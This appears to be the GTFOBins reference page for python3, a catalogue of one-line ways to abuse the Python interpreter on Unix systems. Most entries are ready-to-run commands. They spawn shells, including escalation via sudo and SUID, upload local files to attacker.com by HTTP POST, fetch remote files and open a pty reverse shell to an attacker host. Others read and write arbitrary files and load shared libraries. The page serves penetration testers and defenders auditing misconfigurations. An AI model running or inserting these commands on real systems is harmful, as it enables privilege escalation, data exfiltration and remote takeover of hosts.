GTFOBins.github.io/_gtfobins/python3.md
2018-05-28 20:12:44 +02:00

1.7 KiB

functions
execute-interactive sudo-enabled suid-enabled upload download reverse-shell-interactive file-read file-write load-library
code
python3 -c 'import os; os.system("/bin/sh")'
code
sudo python3 -c 'import os; os.system("/bin/sh")'
code
./python3 -c 'import os; os.system("/bin/sh -p")'
description code
Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. export URL=http://attacker.com/ export LFILE=file_to_send python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
description code
Serve files in the local folder running an HTTP server. LPORT=8888 python3 -m http.server $LPORT
description code
Fetch a remote file via HTTP GET request. export URL=http://attacker.com/file_to_get export LFILE=where_to_save python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
description code
Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell. export RHOST=attacker.com export RPORT=12345 python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
code
python3 -c 'open("file_to_read").read()'
code
python3 -c 'open("file_to_write","w+").write("data")'
code
python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'